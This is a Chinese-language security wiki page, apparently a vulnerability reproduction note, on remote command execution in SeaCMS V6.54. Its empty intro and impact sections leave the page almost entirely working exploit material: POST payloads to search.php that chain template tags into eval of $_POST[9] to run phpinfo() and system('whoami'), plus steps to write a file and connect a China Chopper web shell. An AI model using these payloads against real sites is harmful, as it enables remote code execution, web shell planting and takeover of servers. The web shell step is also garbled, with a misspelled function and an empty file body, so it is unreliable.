menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Seacms V6.54 命令执行漏洞 chevron_right Seacms V6.54 命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Seacms V6.54 命令执行漏洞.md
    1.05 KB / 2021-07-15 20:02:55
        海洋CMS V6.54 命令执行
    ======================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    三、复现过程
    ------------
    
    path:
    
        http://0-sec.org/search.php
    
    POST:
    
        searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
    
    命令执行payload
    
    path:
    
        http://0-sec.org/search.php
    
    POST:
    
        searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem("whoami");
    
    权限足够的话,file\_put\_concents("connect.php",""),然后连接菜刀即可
    
    权限不足的话,利用payload构造url:
    
        http://0-sec.org/search.php?searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))
    
    连接放入
    
    
    links
    file_download